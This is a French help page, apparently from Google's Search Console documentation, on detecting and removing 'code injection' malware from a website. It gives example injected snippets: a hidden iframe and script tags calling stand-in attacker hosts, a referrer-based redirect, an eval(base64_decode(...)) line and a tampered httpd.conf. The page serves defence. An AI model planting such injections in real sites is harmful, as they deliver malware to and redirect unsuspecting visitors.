Type d'infection par logiciel malveillant : injection de code

Quelle est la signification des pages signalées par le type d'infection "Injection de code" dans la Search Console ?

Cela signifie que les pages de votre site ont été modifiées afin d'ajouter du code malveillant, comme un iFrame à un site pirate de logiciel malveillant.

Pour en savoir plus sur les logiciels malveillants, consultez la section Évaluer les dommages (piraté par un logiciel malveillant).

Comment puis-je rechercher le type de logiciel malveillant "injection de code" ?

Tout d'abord, vous ne devez pas utiliser de navigateur pour consulter les pages infectées de votre site. Étant donné que les logiciels malveillants se propagent en exploitant les failles des navigateurs, ouvrir une page infectée par un logiciel malveillant dans un navigateur peut endommager votre ordinateur.

Pensez à vérifier le comportement à l'aide des commandes cURL ou Wget afin d'effectuer des requêtes HTTP (pour explorer une page par exemple). Ces outils disponibles gratuitement sont utiles pour diagnostiquer des URL de redirection et ont la possibilité d'inclure des informations concernant des URL de provenance ou des user-agents. En diffusant du contenu malveillant uniquement aux internautes possédant des user-agents ou des URL de provenance particuliers, le pirate informatique peut cibler plus de "personnes réelles" et peut davantage échapper à la détection par les propriétaires de site et les détecteurs de logiciels malveillants. Votre site doit être en ligne pour utiliser ces outils.

Exemple :

$curl -v --referer <referer-field> --user-agent "Mozilla/5.0 (
  Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.30 (KHTML, comme Gecko) 
  Chrome/12.0.742.112 Safari/534.30" <votre-url>
tel que
$curl -v --referer "http://www.google.com" --user-agent "Mozilla/5.0 
  (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.30 (KHTML, comme Gecko) 
  Chrome/12.0.742.112 Safari/534.30" http://www.example.com/page.html

Connectez-vous ensuite à votre système de fichiers. Recherchez toutes les ressources qui écrivent sur les URL infectées "injection de code". Ci-après quelques exemples d'injections de code malveillant :

<iframe frameborder="0" height="0" src="http://<attack-site>/path/file" 
  style="display:none" width="0"></iframe>
<script type='text/javascript' src='http://malware-attack-site/js/x55.js'></script>
<script>
  if (document.referrer.match(/google\.com/)) {
    window.location("http://malware-attack-site/");
  }
</script>
eval(base64_decode("aWYoZnVuaauUl+hasdqetiDi2iOwlOHTgs+slgsfUNlsgasdf"));
#httpd.conf modified by the hacker
LoadModule harmful_module modules/mod_harmful.so
AddModule mod_harmful.c
  • iFrame vers un site pirate
  • Langage JavaScript ou autre langage de script qui appelle et exécute des scripts provenant d'un site pirate
  • Script qui redirige le navigateur vers un site pirate
  • Code malveillant dissimulé pour ne pas être détecté
  • Fichiers d'objets partagés conçus pour écrire de façon aléatoire un code malveillant sur des scripts non infectés

Recherchez tous les codes malveillants qui peuvent se trouver sur le site. Il s'avère nécessaire de rechercher des mots comme [iFrame] pour trouver le code iFrame. Recherchez aussi "script", "eval" et "unescape". Par exemple, pour les systèmes d'exploitation Unix :

$grep -irn "iframe" ./ | less

Comment puis-je supprimer le type d'infection "Injection de code" de mon site ?

Lorsque vous êtes prêt à nettoyer votre site, vous pouvez remplacer les fichiers concernés par la dernière sauvegarde non infectée ou supprimer l'injection de code de chaque page ainsi que toutes les fonctions ou tous les fichiers de script associés. Si vous avez modifié des fichiers de configuration du serveur, vous devrez peut-être redémarrer votre serveur Web pour que les modifications prennent effet.

Sachez que supprimer le code malveillant ne permet pas de corriger la faille de sécurité qui a initialement permis au pirate informatique d'infecter votre site. Si vous n'en corrigez pas la cause principale, votre site peut à nouveau faire l'objet d'un piratage. Pour plus d'informations sur le nettoyage de l'ensemble de votre site, et pas seulement sur ce type d'infection, consultez l'aide relative aux sites piratés.

Ces informations vous-ont elles été utiles ?
Comment pouvons-nous l'améliorer ?